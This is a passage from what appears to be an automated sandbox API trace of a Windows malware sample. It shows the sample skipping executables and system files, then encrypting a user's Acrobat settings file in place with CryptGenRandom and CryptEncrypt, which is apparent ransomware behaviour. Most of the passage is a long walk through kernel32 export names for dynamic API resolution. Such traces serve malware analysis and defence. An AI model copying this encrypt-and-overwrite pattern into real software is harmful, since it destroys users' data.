(lpString1="glob.settings.js", lpString2="Bootfont.bin") returned 1 [0076.778] lstrlenW (lpString="glob.settings.js") returned 16 [0076.778] lstrcmpiW (lpString1="js", lpString2="lnk") returned -1 [0076.778] lstrcmpiW (lpString1="js", lpString2="exe") returned 1 [0076.778] lstrcmpiW (lpString1="js", lpString2="sys") returned -1 [0076.778] lstrcmpiW (lpString1="js", lpString2="dll") returned 1 [0076.779] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned 77 [0076.779] lstrlenW (lpString="glob.settings.js") returned 16 [0076.779] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\" [0076.779] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\", lpString2="glob.settings.js" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" [0076.779] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.779] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0076.780] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=10) returned 1 [0076.780] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0076.780] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0076.780] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0076.780] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0076.780] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.783] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0076.783] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0076.783] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.783] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0076.784] CloseHandle (hObject=0x464) returned 1 [0076.784] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.784] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0076.785] CloseHandle (hObject=0x0) returned 0 [0076.785] CloseHandle (hObject=0x460) returned 1 [0076.785] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.786] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.786] GetTickCount () returned 0x114bb54 [0076.786] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.786] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0076.786] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0076.786] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.787] lstrlenA (lpString="kernel32.dll") returned 12 [0076.787] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0076.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0076.787] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0076.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0076.787] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0076.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0076.787] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0076.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0076.787] lstrlenA (lpString="ADDATOMA") returned 8 [0076.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0076.787] lstrlenA (lpString="ADDATOMW") returned 8 [0076.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0076.787] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0076.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0076.787] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0076.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0076.787] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0076.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0076.787] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0076.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0076.787] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0076.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0076.787] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0076.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0076.787] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0076.787] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0076.788] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0076.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0076.788] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0076.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0076.788] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0076.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0076.788] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0076.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0076.788] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0076.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0076.788] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0076.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0076.788] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0076.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0076.788] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0076.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0076.788] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0076.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0076.788] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0076.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0076.788] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0076.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0076.788] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0076.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0076.788] lstrlenA (lpString="BACKUPREAD") returned 10 [0076.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0076.788] lstrlenA (lpString="BACKUPSEEK") returned 10 [0076.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0076.788] lstrlenA (lpString="BACKUPWRITE") returned 11 [0076.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0076.788] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0076.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0076.788] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0076.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0076.789] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0076.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0076.789] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0076.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0076.789] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0076.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0076.789] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0076.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0076.789] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0076.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0076.789] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0076.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0076.789] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0076.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0076.789] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0076.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0076.789] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0076.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0076.789] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0076.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0076.789] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0076.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0076.789] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0076.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0076.789] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0076.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0076.789] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0076.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0076.789] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0076.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0076.789] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0076.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0076.789] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0076.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0076.790] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0076.790] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0076.790] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0076.790] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0076.790] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0076.790] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0076.790] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0076.790] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0076.790] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0076.790] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0076.790] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0076.790] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0076.790] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0076.790] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0076.790] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0076.790] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0076.790] lstrlenA (lpString="BEEP") returned 4 [0076.790] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0076.790] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0076.790] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0076.790] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0076.790] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0076.790] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0076.790] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0076.790] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0076.790] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0076.790] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0076.790] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0076.790] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0076.790] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0076.790] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0076.790] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0076.790] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0076.790] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0076.790] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0076.791] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0076.791] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0076.791] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0076.791] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0076.791] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0076.791] lstrlenA (lpString="CANCELIO") returned 8 [0076.791] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0076.791] lstrlenA (lpString="CANCELIOEX") returned 10 [0076.791] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0076.791] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0076.791] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0076.791] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0076.791] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0076.791] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0076.791] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0076.791] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0076.791] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0076.791] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0076.791] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0076.791] lstrlenA (lpString="CHECKELEVATION") returned 14 [0076.791] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0076.791] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0076.791] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0076.791] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0076.791] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0076.791] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0076.791] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0076.791] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0076.791] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0076.791] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0076.791] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0076.791] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0076.791] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0076.791] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0076.792] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0076.792] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0076.792] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0076.792] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0076.792] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0076.792] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0076.792] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0076.792] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0076.792] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0076.792] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0076.792] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0076.792] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0076.792] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0076.792] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0076.792] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0076.792] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0076.792] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0076.792] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0076.792] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0076.792] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0076.792] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0076.792] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0076.792] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0076.792] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0076.792] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0076.792] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0076.792] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0076.792] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0076.792] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0076.792] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0076.792] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0076.792] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0076.792] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0076.792] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0076.793] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0076.793] lstrlenA (lpString="COMPARESTRINGEX") returned 15 